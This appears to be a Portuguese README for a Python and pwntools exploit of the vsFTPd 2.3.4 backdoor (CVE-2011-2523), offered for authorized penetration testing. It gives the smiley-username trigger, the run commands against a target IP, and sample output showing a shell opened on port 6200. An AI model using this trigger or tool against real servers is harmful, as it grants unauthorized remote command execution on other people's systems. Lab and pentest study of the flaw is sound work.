
Exploit em Python para backdoor do vsFTPd 2.3.4 (CVE-2011-2523) que aciona um shell oculto na porta 6200 através de um nome de usuário manipulado, permitindo execução remota de comandos para testes de penetração autorizados.
Este projeto demonstra a exploração da vulnerabilidade backdoor vsFTPd 2.3.4 (CVE-2011-2523) usando Python e pwntools.
Aviso: Este projeto é apenas para fins educacionais e de testes de penetração autorizados. NÃO use contra sistemas sem permissão.
👉 A versão vulnerável do vsFTPd contém um backdoor malicioso que é acionado quando um nome de usuário contendo :) é usado durante o login.
vsFTPd 2.3.4USER hello:))pwntoolsInstale as dependências:
pip install pwntools
python3 exploit.py <TARGET_IP>
python3 exploit.py <TARGET_IP> <PORT>
python3 exploit.py 192.168.190.140
[+] Checking FTP Version...
[+] Triggering backdoor...
[+] Connecting to backdoor....
[+] Got Shell
$
O alvo deve estar executando vsFTPd 2.3.4 (versão vulnerável)
A porta 6200 deve estar acessível
Funciona melhor em ambientes de laboratório como: